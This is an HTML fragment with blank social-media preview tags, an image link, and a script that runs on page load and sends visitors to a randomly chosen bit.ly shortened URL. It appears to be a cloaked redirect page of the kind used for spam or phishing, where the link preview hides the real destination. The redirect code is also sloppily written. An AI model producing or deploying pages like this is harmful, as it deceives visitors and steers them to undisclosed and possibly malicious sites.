<meta property="og:title" content=" ..">
<meta property="og:description" content="
                               

....

">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
https://blogger.googleusercontent.com/img/a/AVvXsEi_6ofMdZkeeux02F7KoFbGP1p4K6fT3gpvwFlhxqsFzK7LUfxVv-3X-gkGIZZUqUGFbm0QPnMMvtjGL-12EeLW-WQCr-70QPmCfUxqKyXAm5VaCDTQVFXF0MjHY057iSr-vEFGpl0E-EgnTGU0N-PdkoGyjRN5Wekf_tN8lCJVK1p4rAX1NHE59f4oSw=s16000
">                             
<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pon";
c = location.href = "pona";
d = Math.ceil(Math.random() * 24);
a = "https://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>
